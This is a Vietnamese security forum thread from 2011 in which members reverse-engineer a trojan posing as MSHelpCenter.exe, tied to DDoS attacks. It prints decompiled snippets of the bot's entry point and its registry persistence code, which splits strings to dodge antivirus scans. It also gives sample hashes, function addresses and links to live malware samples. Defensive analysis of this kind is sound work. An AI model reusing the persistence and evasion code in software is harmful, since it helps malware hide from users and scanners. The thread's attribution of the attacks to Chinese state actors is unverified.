5- Trong trường hợp nghi ngờ một file loại này có virus mà không thể kiểm bằng digitally signed thì đành phải kiểm bằng cách khác, như tôi đã nói: kiểm vị trí đúng (right location) của file trong directory. Hacker không có thể đặt các file trùng tên trong một folder, nhưng trong 2 folder khác nhau thì lại được. Tuy nhiên ở các OS khác nhau thì vị trí đúng của file có thể khác nhau. Đó là điều khó.

Và cách đáng tin nhất nhất là check nó trên mạng để kiểm tra có nhiễm virus hay không, như tôi đã làm với file MSHelpCenter.exe và post hình lên.

Tuy nhiên tôi chỉ xác nhân là cái file MSHelpCenter.exe (nằm trong một folder có tên là "MSHelpCenter"- being zipped) mà bạn asaxin upload lên Mediafire vừa qua là không có virus thôi (nhưng file MSHelpCenter.idx, cũng trong folder nói trên, là có virus rõ ràng).
Tôi không biết và không đề cập đến tất cả các file MSHelpCenter.exe khác ngoài file nói trên
The absence of disagreement is not harmony, it's apathy.
(Socrates)
Honest disagreement is often a good sign of progress.
(Mahatma Gandhi)
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 26/07/2011 11:01:41 (+0700) | #135 | 244175
rang0
Member
[Minus] 0 [Plus]
Joined: 25/07/2011 10:55:47
Bài gởi: 19
Offline
[Profile] [PM]
PXMMRF wrote:
Tuy nhiên tôi chỉ xác nhân là cái file MSHelpCenter.exe (nằm trong một folder có tên là "MSHelpCenter"- being zipped) mà bạn asaxin upload lên Mediafire vừa qua là không có virus thôi (nhưng file MSHelpCenter.idx, cũng trong folder nói trên, là có virus rõ ràng).
Tôi không biết và không đề cập đến tất cả các file MSHelpCenter.exe khác


Gửi anh PXMMRF,

Em không biết anh có đọc mấy bài trước của anh TQN và bạn acoustics89 phân tích hay không mà anh lại khẳng định như thế ạ ? File MSHelpCenter (MD5: 915E9432CA9414A771071EE0CC115930) được zip cùng file MSHelpCenter.idx mà bạn asaxin đã upload rõ ràng là malware. Chính nó là con download AcrobatUpdater.exe về đấy ạ.

Theo như hình kết quả từ virustotal, chưa có chương trình AV nào detect em nó không có nghĩa là em nó clean, và mấy cái thông tin internal name, orginal name, ... hoàn toàn có thể fake được mà anh.

Rang0 !
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 26/07/2011 11:07:09 (+0700) | #136 | 244176
PXMMRF
Administrator
Joined: 26/09/2002 07:17:55
Bài gởi: 946
Offline
[Profile] [PM]
rang0 wrote:
PXMMRF wrote:
Tuy nhiên tôi chỉ xác nhân là cái file MSHelpCenter.exe (nằm trong một folder có tên là "MSHelpCenter"- being zipped) mà bạn asaxin upload lên Mediafire vừa qua là không có virus thôi (nhưng file MSHelpCenter.idx, cũng trong folder nói trên, là có virus rõ ràng).
Tôi không biết và không đề cập đến tất cả các file MSHelpCenter.exe khác


Gửi anh PXMMRF,

Em không biết anh có đọc mấy bài trước của anh TQN và bạn acoustics89 phân tích hay không mà anh lại khẳng định như thế ạ ? File MSHelpCenter (MD5: 915E9432CA9414A771071EE0CC115930) được zip cùng file MSHelpCenter.idx mà bạn asaxin đã upload rõ ràng là malware. Chính nó là con download AcrobatUpdater.exe về đấy ạ.

Theo như hình kết quả từ virustotal, chưa có chương trình AV nào detect em nó không có nghĩa là em nó clean, và mấy cái thông tin internal name, orginal name, ... hoàn toàn có thể fake được mà anh.

Rang0 !

Tôi đọc kỹ, rất kỹ là khác. Nhưng chính TQN cũng đang thấy cần phải kiểm tra lai mà. Xem những post cuối cùng của TQN (xem kỹ nhé- Thanks)
The absence of disagreement is not harmony, it's apathy.
(Socrates)
Honest disagreement is often a good sign of progress.
(Mahatma Gandhi)
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 26/07/2011 11:13:41 (+0700) | #137 | 244177
rang0
Member
[Minus] 0 [Plus]
Joined: 25/07/2011 10:55:47
Bài gởi: 19
Offline
[Profile] [PM]
int __stdcall wWinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPWSTR lpCmdLine, int nShowCmd)
{
int v4; // eax@0
unsigned int v6; // [sp-10h] [bp-38h]@1
HANDLE hObject; // [sp+0h] [bp-28h]@12
DWORD ThreadId; // [sp+4h] [bp-24h]@12
WCHAR v9; // [sp+8h] [bp-20h]@4
LPCWSTR lpFileName; // [sp+Ch] [bp-1Ch]@4
unsigned int *v11; // [sp+10h] [bp-18h]@1
int v12; // [sp+18h] [bp-10h]@1
int (__cdecl *v13)(int, PVOID, int); // [sp+1Ch] [bp-Ch]@1
unsigned int v14; // [sp+20h] [bp-8h]@1
int v15; // [sp+24h] [bp-4h]@1
int v16; // [sp+28h] [bp+0h]@1

v13 = _except_handler4;
v12 = v4;
v14 = __security_cookie ^ (unsigned int)&unk_4126C8;
v6 = (unsigned int)&v16 ^ __security_cookie;
v11 = &v6;
v15 = 0;
SetUnhandledExceptionFilter(TopLevelExceptionFilter);
if ( lstrlenW(lpCmdLine) <= 3 )
{
if ( !lstrlenW(lpCmdLine) )
{
ThreadId = 0;
hObject = CreateThread(0, 0x80000u, StartAddress, 0, 0, &ThreadId);
CloseHandle(hObject);
create_bot();
}
}
else
{
if ( *lpCmdLine == '-' && lpCmdLine[2] == ' ' )
{
v9 = lpCmdLine[1];
lpFileName = lpCmdLine + 3;
switch ( v9 )
{
case 'd':
delete_file(lpFileName);
break;
case 'r':
create_process(lpFileName, &CommandLine, 0);
break;
case 'b':
create_new_process(lpFileName, 0);
break;
}
}
}
return 0;
}


và

Code:
lstrcpyW(&SubKey, L"softw");
lstrcatW(&SubKey, L"are\\micr");
lstrcpyW((LPWSTR)&v6, L"kjewoopipo");
lstrcatW(&SubKey, L"osoft\\w");
lstrcpyW((LPWSTR)&v6, L"rewfe");
lstrcatW(&SubKey, L"indo");
lstrcatW(&SubKey, L"ws\\");
lstrcatW(&SubKey, L"Microsoft Help Center");
RegCreateKeyExW(HKEY_CURRENT_USER, &SubKey, 0, 0, 0, 0xF003Fu, 0, &hKey, &dwDisposition);
cbData = 2000;
v12 = RegQueryValueExW(hKey, ValueName, 0, &Type, (LPBYTE)Data, &cbData);
if ( v12 )
{
v1 = lstrlenW((LPCWSTR)Data);
RegSetValueExW(hKey, ValueName, 0, 1u, (const BYTE *)Data, 2 * v1);
}
RegCloseKey(hKey);


Em cũng không biết có file MSHelpCenter nào của MS mà nó có hành vi như trên không nữa ạ ?
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 26/07/2011 11:14:16 (+0700) | #138 | 244178
PXMMRF
Administrator
Joined: 26/09/2002 07:17:55
Bài gởi: 946
Offline
[Profile] [PM]
ptv_vbhp wrote:
Em dùng Bkav pro . Hôm trước down mấy mẫu về thấy nó nhai ngon lành . Hic hic ... Cả file fake kia lẫn cái file *.dix





BKAV pro đã phát hiện ra virus-trojạn trong file MSHelpCenter.idx rồi à? .Rất hoan nghênh.
Nhưng Virus DAT file update vào ngày nảo? Tháng 6, tháng 7/2011?
The absence of disagreement is not harmony, it's apathy.
(Socrates)
Honest disagreement is often a good sign of progress.
(Mahatma Gandhi)
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 26/07/2011 11:15:34 (+0700) | #139 | 244179
acoustics89
Member
[Minus] 0 [Plus]
Joined: 08/07/2011 10:17:19
Bài gởi: 50
Offline
[Profile] [PM]
là người viết các kết quả phân tích; Em tự tin vào cái mà em lần ra, em tự tin và khẳng định nó là virus ạ. Cho dù các phần mềm khác có đưa kết quả clean đi nữa, em vẫn chỉ tin vào Olly và IDA.

trong MSHelpCenter.exe

File Offset 000136B0h: G4GD7ND0CDL4DB7CB0CD3ED6KD9YC2FDYN7BD0OCP4JD7QD0ED3FD6HDO0TC3OC6CD

địa chỉ của hàm decode :401B30h

Hàm download : 4015B0h

Ngoài ra còn hàm này để ghi key trong registry:4017F0h
Cái xâu bị cắt vụn ra, tránh emulator, dò string của các av, liệu có coder nào rảnh đến mức cắt như thế không ạ
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 26/07/2011 11:23:23 (+0700) | #140 | 244180
ptv_vbhp
Member
[Minus] 0 [Plus]
Joined: 25/07/2011 10:16:44
Bài gởi: 11
Offline
[Profile] [PM]
PXMMRF wrote:

BKAV pro đã phát hiện ra virus-trojạn trong file MSHelpCenter.idx rồi à? [/color].Rất hoan nghênh.
Nhưng Virus DAT file update vào ngày nảo? Tháng 6, tháng 7/2011?

Con fake adobe thì em thấy mới có thứ 7 tuần trước, còn con idx kia thì em ko biết rõ vì máy em ko có file này để check lúc trước smilie .
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 26/07/2011 11:38:14 (+0700) | #141 | 244182
PXMMRF
Administrator
Joined: 26/09/2002 07:17:55
Bài gởi: 946
Offline
[Profile] [PM]
rang0 wrote:


Em cũng không biết có file MSHelpCenter nào của MS mà nó có hành vi như trên không nữa ạ ?



Tôi ghi nhân ý kiến của bạn và tôi sẽ nghiên cứu kỹ để làm rõ 1 vài vấn đề đến nay
tôi vẫn còn thắc mắc. Thanks (Tôi cũng sẽ kiểm tra lai code của file này lần nữa, dù kinh nghiêm khả năng về mặt này thưc ra không bằng TQN)

Đó là:

1 -Service, process nào download các file MSHelpCenter.exe về máy hoăc process nào inject malicious code vào file này?? ( Ngay từ lúc đầu file MSHelpCenter.exe có bị nhúng virus hay không?)

2- Virus-Trojạn nằm trong file MSHelpCenter.idx có quan hệ tác động gì đến file MSHelpCenter.exe, khi nào, tiến trình xảy ra theo trình tự thế nào khi máy bị nhiễm virus?

3- File đầu tiên gây nhiễm cho máy user mà user download về trên mạng (thí dụ Vietkey, Unikey....) là file nào trong trường hợp này.? Dĩ nhiên không phải là chính các file MSHelpCenter.exe hay MSHelpCenter.idx, vì dung lượng của chúng quá lơn, mà cũng chẳng ai lai cần download chúng về làm gì cả

Vậy bạn có ý kiến thế nào về những vấn đề tôi đang thắc mắc, để tôi có thể giải toả và có kết luận cuối cùng cho mình??

The absence of disagreement is not harmony, it's apathy.
(Socrates)
Honest disagreement is often a good sign of progress.
(Mahatma Gandhi)
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 26/07/2011 11:44:58 (+0700) | #142 | 244183
lequi
Member
[Minus] 0 [Plus]
Joined: 29/04/2007 18:13:32
Bài gởi: 77
Offline
[Profile] [PM]
acoustics89 wrote:
@lequi: chắc anh em lại cùng với bạn phối hợp lấy mẫu như hôm qua. xong bạn up mẫu lên đây nhé, mọi người phân tích cũng nhanh thôi

Mình rất sẵn lòng.

Mớ packet và các nghi ngờ của mình bắt đầu xuất hiện từ sau khi chạy setup unikey này http://nethoabinh.com/showthread.php?t=315). Mình vẫn chưa lần mò ra được gì smilie, có thể máy mình vẫn đang có trojian, nhưng có thể đây là 1 phiên bản trước đây khá lâu (tháng 11/2009), các user-agent và url đều khác, mặc dù cấu trúc là giống nhau (Gozilla và ?cpn).

Không biết mình phải làm gì tiếp đây?
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 26/07/2011 11:55:00 (+0700) | #143 | 244185
PXMMRF
Administrator
Joined: 26/09/2002 07:17:55
Bài gởi: 946
Offline
[Profile] [PM]
acoustics89 wrote:
là người viết các kết quả phân tích; Em tự tin vào cái mà em lần ra, em tự tin và khẳng định nó là virus ạ. Cho dù các phần mềm khác có đưa kết quả clean đi nữa, em vẫn chỉ tin vào Olly và IDA.

trong MSHelpCenter.exe

File Offset 000136B0h: G4GD7ND0CDL4DB7CB0CD3ED6KD9YC2FDYN7BD0OCP4JD7QD0ED3FD6HDO0TC3OC6CD

địa chỉ của hàm decode :401B30h

Hàm download : 4015B0h

Ngoài ra còn hàm này để ghi key trong registry:4017F0h
Cái xâu bị cắt vụn ra, tránh emulator, dò string của các av, liệu có coder nào rảnh đến mức cắt như thế không ạ


Cám ơn các thông tin của em và anh rất tin vào những dòng code em post lên, nó đã rõ ràng như em nhận định.
Nhưng chỉ hỏi thêm điều này, nêu thấy không tiện thì không trả lời cũng được: Em có chắc chắn máy em dùng dể desassembling các file ấy có "clean" 100% hay không?

Note. Anh đã cẩn thận check file MSHelpCenter.exe không chỉ trên virustotal mà còn trên ít nhất 8 filechecking website khác nữa, của các hảng antivirus nổi tiếng nhất. Hì hì
The absence of disagreement is not harmony, it's apathy.
(Socrates)
Honest disagreement is often a good sign of progress.
(Mahatma Gandhi)
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 26/07/2011 12:32:21 (+0700) | #144 | 244187
acoustics89
Member
[Minus] 0 [Plus]
Joined: 08/07/2011 10:17:19
Bài gởi: 50
Offline
[Profile] [PM]
Em toàn dùng máy ảo để desassembling code , tất cả đều trong máy ảo cả. Máy ảo em tự cài từ đầu, các phần mềm bên trong cũng qua kiểm duyệt hết rồi

Bây giờ đơn giản là anh dùng 1 chương trình Hex editor, jump đến các offset trong file MSHelpCenter.exe như em nói xem có đúng là nó thế hay không, chương trình hex editor nào cũng được. Nếu nó đúng, thì đó là 1 bằng chứng, 1 ví dụ về việc : các av bây giờ cũng chưa phải quá mạnh, việc tin tưởng vào nó là hơi phiêu lưu và mạo hiểm. Mặc dù đã được trang bị các công nghệ như emulator, Heurristic, thì vẫn không thể tin tưởng được. Có thể là 1 chiêu marketing của các AV...

Và bây giờ, công nghệ tạo ra malware đang đi trước chung ta 1 bước. Hiện thực đáng sợ này bao giờ mới chấm dứt đây
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 26/07/2011 12:58:44 (+0700) | #145 | 244188
PXMMRF
Administrator
Joined: 26/09/2002 07:17:55
Bài gởi: 946
Offline
[Profile] [PM]
lequi wrote:
acoustics89 wrote:
@lequi: chắc anh em lại cùng với bạn phối hợp lấy mẫu như hôm qua. xong bạn up mẫu lên đây nhé, mọi người phân tích cũng nhanh thôi

Mình rất sẵn lòng.

Mớ packet và các nghi ngờ của mình bắt đầu xuất hiện từ sau khi chạy setup unikey này http://nethoabinh.com/showthread.php?t=315). Mình vẫn chưa lần mò ra được gì smilie, có thể máy mình vẫn đang có trojian, nhưng có thể đây là 1 phiên bản trước đây khá lâu (tháng 11/2009), các user-agent và url đều khác, mặc dù cấu trúc là giống nhau (Gozilla và ?cpn).

Không biết mình phải làm gì tiếp đây?


Cám ơn nhiệt tình đáng quí của em. Mình làm việc này không chỉ cho HVA, mà còn có lơi cho công đồng, đất nước. Tôi sẽ phân tích các lý do của những hành động mà STL (tay sai cho Tầu) đã làm vừa qua. Việc phát hiện thông qua kỹ thuật mạng để biết STL liên quan chặt chẽ với chính quyền TQ đã khó rồi, nhưng việc sau đó lý giải một cách hơp lý lý do của các hành động của STL thời gian qua lai khó hơn rất nhiều.

Quay trở lai vấn đề của topic. Với các thông tin của các bạn trong đó có lequi tôi đã tìm thấy ít nhất 5 master website-server của STL và đã check kỹ vào chúng để có các thông tin. Chúng đặt ở nhiều nơi trên TG. Điều ngạc nhiên là trong số 5 website-webserver nói trên có một cái khá hoành tráng về quy mô và cấu hình. Không hiểu có phải webserver này đã bị STL thâm nhập chiếm quyền admin.hay không?
Chỉ mong các thông tin các bạn đưa ra là chính xác. Virus-Trojan liên hệ với các master-website này đúng là của STL, chứ không phải các hacker khác.

Một điều mà tôi thấy chúng ta làm chưa thật tốt là chưa xác định được chính xác các process, service.. nào thưc sự kết nối đến các master website nói trên.
Thưc ra để xác định chính xác điều này không dễ như tôi đã từng nhận định một cách chủ quan ở 1 bài viết trong topic này. Với tôi thì như vậy. Với các bạn khác có thể không như vậy.

Các soft mà các bạn dùng như Wireshark và Process Monitoring... thưc ra không đáp ứng yêu cầu của ta, cũng không hẳn là đồ chuyên nghiệp của dân chơi mạng. Trên wireshark ta chỉ thấy các IP kết nôi (trừ khi phân tích kỹ bên trong packet thì có thể thêm vài thông tin) nhưng không thể biết các process kích hoạt kết nối. Còn trong Process Monitoring thì thấy tên các process (nhiều là khác) nhưng không hề biết các connection...vân vân.
Theo tôi trong trường hợp này các bạn nên sử dung các Advanced firewall (loại mới-tiên tiến). Với firewall loai này, cùng lúc, các ban biết tên, vị trí trên directory các process kích hoạt các kết nối, đia chỉ IP và computer name của mục tiêu và kể cả RX -TX....
Firewall cũng cho phép ta ngăn sư thâm nhập sâu vào máy của virus 1 cách rất hiệu quả vì một malicious process nào của virus khởi chạy là firewall chặn lại chờ sự cho phép của ta.

Vì vậy nếu ban lequi cần một firewall như vậy, thì tôi sẽ gửi đến bạn qua email. Hoăc bạn tự tìm cái tốt hơn. Có công cụ này việc ban giúp, làm sẽ dễ hơn
The absence of disagreement is not harmony, it's apathy.
(Socrates)
Honest disagreement is often a good sign of progress.
(Mahatma Gandhi)
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 26/07/2011 13:07:32 (+0700) | #146 | 244189
[Avatar]
bolzano_1989
Journalist
[Minus] 0 [Plus]
Joined: 30/01/2007 12:49:15
Bài gởi: 1406
Offline
[Profile] [PM]
lequi wrote:
acoustics89 wrote:
@lequi: chắc anh em lại cùng với bạn phối hợp lấy mẫu như hôm qua. xong bạn up mẫu lên đây nhé, mọi người phân tích cũng nhanh thôi

Mình rất sẵn lòng.

Mớ packet và các nghi ngờ của mình bắt đầu xuất hiện từ sau khi chạy setup unikey này http://nethoabinh.com/showthread.php?t=315). Mình vẫn chưa lần mò ra được gì smilie, có thể máy mình vẫn đang có trojian, nhưng có thể đây là 1 phiên bản trước đây khá lâu (tháng 11/2009), các user-agent và url đều khác, mặc dù cấu trúc là giống nhau (Gozilla và ?cpn).

Không biết mình phải làm gì tiếp đây?


Updated: Sau khi điều tra với anh em HVA xong, bạn có thể quét với CMC Antivirus (bản miễn phí nhưng luôn được cập nhật như bản CMCIS ấy smilie ):
http://pcu.cmclab.net/download/setupCMCIS.exe

Tiếp theo, bạn gửi boot log với Process Monitor:
Hướng dẫn scan và gửi boot log với Process Monitor
http://support.cmclab.net/vn/tut0rial/h4327899ng-d7851n-scan-v224-g7917i-boot-log-v7899i-process-monitor/

Rồi gửi log Autoruns:
Hướng dẫn scan và gửi log Autoruns
http://support.cmclab.net/vn/tut0rial/huong-dan-scan-va-gui-log-autoruns/
Kiểm tra các file bạn nghi ngờ có virus:
http://goo.gl/m3Fb6C
http://goo.gl/EqaZt
http://goo.gl/gEF8e
Nhận mẫu virus qua FB: http://goo.gl/70Xo23
HVA Malware Response Team: kiemtravirus@gmail.com
Trợ giúp diệt virus: http://goo.gl/2bqxY
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 26/07/2011 13:17:36 (+0700) | #147 | 244190
PXMMRF
Administrator
Joined: 26/09/2002 07:17:55
Bài gởi: 946
Offline
[Profile] [PM]
Ấy lequi đừng quét virus vôi. Cứ để thế mới điều nghiên được chứ.
Xong việc thì quét theo hướng dẫn trợ giúp của bolzano_1989
The absence of disagreement is not harmony, it's apathy.
(Socrates)
Honest disagreement is often a good sign of progress.
(Mahatma Gandhi)
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 26/07/2011 13:28:01 (+0700) | #148 | 244192
ptv_vbhp
Member
[Minus] 0 [Plus]
Joined: 25/07/2011 10:16:44
Bài gởi: 11
Offline
[Profile] [PM]
Có 1 điều mà em vẫn cứ thắc mắc giống bác PXMMRF là thế cái file MS...exe được đẻ ở bệnh viện nào thế smilie vả lại 2 anh chàng cùng tên Ms.... có quan hệ đến nhau gì ko ấy nhở ?
Còn 1 cái nữa em hỏi anh acoustics89 với smilie. Theo như em phân tích file Ms...exe thì thấy cái hàm 401F90 là để giải mã lần 2 từng xâu trong file DAT down về( sau khi giải mã lần 1 file DAT đó để có link down con VB) thì được các xâu lưu trữ lại nhưng em thấy chả được cái xâu nào sau khi giải mã lần 2 ấy cả ???
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 26/07/2011 13:48:45 (+0700) | #149 | 244195
rang0
Member
[Minus] 0 [Plus]
Joined: 25/07/2011 10:55:47
Bài gởi: 19
Offline
[Profile] [PM]
PXMMRF wrote:

1 -Service, process nào download các file MSHelpCenter.exe về máy hoăc process nào inject malicious code vào file này?? ( Ngay từ lúc đầu file MSHelpCenter.exe có bị nhúng virus hay không?)

2- Virus-Trojạn nằm trong file MSHelpCenter.idx có quan hệ tác động gì đến file MSHelpCenter.exe, khi nào, tiến trình xảy ra theo trình tự thế nào khi máy bị nhiễm virus?

3- File đầu tiên gây nhiễm cho máy user mà user download về trên mạng (thí dụ Vietkey, Unikey....) là file nào trong trường hợp này.? Dĩ nhiên không phải là chính các file MSHelpCenter.exe hay MSHelpCenter.idx, vì dung lượng của chúng quá lơn, mà cũng chẳng ai lai cần download chúng về làm gì cả

Vậy bạn có ý kiến thế nào về những vấn đề tôi đang thắc mắc, để tôi có thể giải toả và có kết luận cuối cùng cho mình??


Em xin trả lời :

1. Ý thứ (1) và thứ (3) của anh (nội dung gần giống nhau) thì hiện giờ em nghĩ không thể xác định được (với chỉ những file mà asaxin up lên cho chúng ta), có lẽ cần có thêm thời gian để phát hiện ra thêm điều gì đó smilie.

2. Cái file MSHelpCenter.idx thì em thấy nó sẽ được chạy hay không là phụ thuộc vào nội dung file cấu hình mà MSHelpCenter.exe tải về từ control server. MSHelpCenter.idx được rename thành file .msi, nhận tham số và thực thi. Nhưng với file MSHelpCenter.idx nhận được từ asaxin thì hình như không bao giờ làm nhiệm vụ smilie.

Edited : Ở trên em nhầm, file MSHelpCenter.idx là file trung gian, nó sẽ được MSHelpCenter.exe rename thành một file random.msi, sau đó MSHelpCenter.exe truyền tham số cho file .msi này (thông qua file .cfg). File .msi sẽ run và kiểm tra tham số và cuối cùng chỉ là để execute file AcrobatUpdater.exe (đã được decrypt từ file images.gif)
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 26/07/2011 14:47:25 (+0700) | #150 | 244198
[Avatar]
conmale
Administrator
Joined: 07/05/2004 23:43:15
Bài gởi: 9353
Đến từ: down under
Offline
[Profile] [PM]
acoustics89 wrote:
Em toàn dùng máy ảo để desassembling code , tất cả đều trong máy ảo cả. Máy ảo em tự cài từ đầu, các phần mềm bên trong cũng qua kiểm duyệt hết rồi

Bây giờ đơn giản là anh dùng 1 chương trình Hex editor, jump đến các offset trong file MSHelpCenter.exe như em nói xem có đúng là nó thế hay không, chương trình hex editor nào cũng được. Nếu nó đúng, thì đó là 1 bằng chứng, 1 ví dụ về việc : các av bây giờ cũng chưa phải quá mạnh, việc tin tưởng vào nó là hơi phiêu lưu và mạo hiểm. Mặc dù đã được trang bị các công nghệ như emulator, Heurristic, thì vẫn không thể tin tưởng được. Có thể là 1 chiêu marketing của các AV...

Và bây giờ, công nghệ tạo ra malware đang đi trước chung ta 1 bước. Hiện thực đáng sợ này bao giờ mới chấm dứt đây


Hì hì, chỉ nhìn vô cái metadata của MsHelpCenter.exe là thấy không phải hiền lành rồi:

Code:
Meta-data
=======
File: MsHelpCenter.exe
Size: 9332736 bytes
Type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
MD5: 915e9432ca9414a771071ee0cc115930
SHA1: 9ec74f80c7b03ff2ab4ecbe57b5a1d0296a3bee6
ssdeep: 3072:acFDLF09RoMPXa5zgKSfpBitAggb4d/VpvF2CmsNd:tFDLFFW8gbpUt7V7Vms
Date: 0x4D1868C7 [Mon Dec 27 10:21:59 2010 UTC]
EP: 0x403272 .text 0/5
CRC: Claimed: 0x30c13, Actual: 0x8e87d2 [SUSPICIOUS]

What bringing us together is stronger than what pulling us apart.

mv1098
Member
[Minus] 0 [Plus]
Joined: 18/07/2009 14:19:13
Bài gởi: 119
Offline
[Profile] [PM]
@bolzano_1989 : gui bro mau virus nay

http://www.mediafire.com/?xyqk2z1jnp1zcd9

Con này mạo danh Avira GmbH

Bác xử lý giùm nhé
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 26/07/2011 14:57:27 (+0700) | #152 | 244200
ptv_vbhp
Member
[Minus] 0 [Plus]
Joined: 25/07/2011 10:16:44
Bài gởi: 11
Offline
[Profile] [PM]
Đúng là ko phải hiền lành anh ạ ! Em cũng RE nó rồi thằng này chạy nhờ 2 cái thằng desktop vơi thằng thumbcache kia. 2 thằng đấy nó dùng để hỗ trợ download với giải mã cho các file mà thằng MS giả này down về và thực thi con VB giả. Hình thức dùng các thư viện riêng như kiểu 2 file trên có vẻ mới nhỉ ? smilie
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 26/07/2011 15:11:32 (+0700) | #153 | 244201
exception
Member
[Minus] 0 [Plus]
Joined: 10/07/2011 23:48:25
Bài gởi: 15
Offline
[Profile] [PM]
Hình như 2 file trong http://www.mediafire.com/?xyqk2z1jnp1zcd9 bạn mv1098 gửi là virus Sality cơ mà, không phải của STL đâu.
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 26/07/2011 15:13:01 (+0700) | #154 | 244203
ptv_vbhp
Member
[Minus] 0 [Plus]
Joined: 25/07/2011 10:16:44
Bài gởi: 11
Offline
[Profile] [PM]
Ờ là trojan bị nhiễm sality hay sao ý ? em thấy bkav báo thế ??? Có phải của STL đâu smilie
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 26/07/2011 15:23:06 (+0700) | #155 | 244205
mv1098
Member
[Minus] 0 [Plus]
Joined: 18/07/2009 14:19:13
Bài gởi: 119
Offline
[Profile] [PM]
Cái mẫu này em tính nhờ bro bolzano_1989 nghiên cứu giùm vì em cái CMC mà không diệt được.

Máy em đang bị nhiễm virus, đang tính làm chuột bạch để chạy mấy mẫu của STL ở trên mà cái Wireshark nó ko tương thích với card mạng của em
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 26/07/2011 15:30:22 (+0700) | #156 | 244208
TQN
Elite Member
[Minus] 0 [Plus]
Joined: 29/06/2006 22:28:01
Bài gởi: 888
Đến từ: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
Hì hì, sáng giờ đi lang thang, giờ mới về tới nhà. Topic này nhộn nhịp quá ha !
2 asaxin: các file trong mauboot.rar của cậu, tui đã kiểm tra kỹ, 100% sạch.
Còn một số file nữa, còn thiếu. Cậu bật view hidden files lên, hay dùng 7zip, WinRar, tìm và up hộ các file đó lên cái. Cố tìm và up, xoá file StaticCaches.dat. Thằng này đã ăn cắp toàn bộ Passwords của tui đó.

Em xin nhắc lại: bà con down dùng em cái tool Everything về cái: http://www.voidtools.com. Gọn, nhẹ, không cần install, tìm bất cứ file nào là trong tích tắc.

2 lequy: Máy cậu chắc chắn có thằng nằm vùng rồi. Bình tĩnh, từ từ mà làm. Đừng quét bằng AV. Tạm thời chịu khó hy sinh một chút, coi như làm việc thiện giúp đỡ anh em.

Các link đó đều thuộc host sandret mà anh conmale đã đề cập.

Bây giờ cứ để đó, lên mạng down SysInternals Suite, CurrPort, SmartSniff. Đọc help và tập dùng.
Chỉ cần nhiêu đó là đủ tìm ra "mèo què" rồi, không cần đao to búa lớn đâu.
Bất kỳ tool nào, mình hiểu nó 1 thì nó mang lại cho mình 1, hiểu 10 thì mang lại 10.
Tập trung vào Process Explorer và ProcMon, AutoRuns, TCPView. Đọc help cho kỹ.
Trong Process Explorer, check menu "Verify Image Signatures" trong Options menu.
Duyệt từng process trên upper panel, right click - Properties, click tab TCP/IP. Nếu thấy có connect tới link đó thì xem process đó có verify không (trong tab Image). Nếu không có verify => à à, mày là "mèo què". Còn có, verify từng Dll của process đó, cũng right click - Properties, Verify. Thằng nào không có verified thì up lên. Up lầm còn hơn bỏ sót.

Nghi ngờ process nào thì bật ProcMon lên, chỉ cho ProcMon filter chính process đó.

Chà, em viết xong, đọc lại thấy méo miệng luôn, lũng cũng quá, không biết lequy có hiểu không nhỉ ?

PS: À mà còn việc này nữa, MSHelpCenter.exe chính là virus. Nhưng nếu nó chỉ có một mình, thì có thể xem như nó clean, sạch sẽ. Nhưng nếu để nó nằm trong ổ của nó gồm MSHelpCenter.idx, thumbcache.db, _desktop.ini, thì tụi nó kết hợp lại thành ổ virus.
Đừng băn khoăn thắc mắc nó sạch hay không sạch. Ba cái trò viết EXE, DLL xong vào Resource Version, gõ gõ mấy cái Name, Company, Product fake của MS, Acrobat, Sun... xưa như trái đất rồi, mấy anh stl ?

Hỏi mấy anh stl nhé: Giả sử mấy anh dùng fake version info, tìm cách nào đó ăn cắp được signatures của MS và sign nó với PE của mấy anh, thì còn cách nào khác em biết được file PEs của mấy anh là mạo danh ? Dựa trên cái gì: pdb symbol, rich info, compiler/linker ver, coding style ?

À sẵn đây em nói luôn 1 bí mật nhé, toàn bộ file của Windows mà MS build đều dùng một internal compiler/linker riêng, không public như Visual Studio đâu. Nó có điểm nhận dạng rất đặc biệt, IDA signature apply vào thì từ 0 tới 0. Sinh code rất quái ! MS coder dùng xong mới trích vài phần public ra ngoài thông qua Visual Studio.

Còn jucheck.exe của nobita thì chắc chắn không phải virus của STL. File jucheck của nobita file file PE 32+, build mode 64bit, AMD, code của Sun coder đàng hoàng, rõ ràng minh bạch.
Mấy anh STL chắc chưa thử build virus của mấy anh ở 64bit, victim ít quá mà ăn thua gì !

[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 26/07/2011 15:41:14 (+0700) | #157 | 244210
[Avatar]
bolzano_1989
Journalist
[Minus] 0 [Plus]
Joined: 30/01/2007 12:49:15
Bài gởi: 1406
Offline
[Profile] [PM]
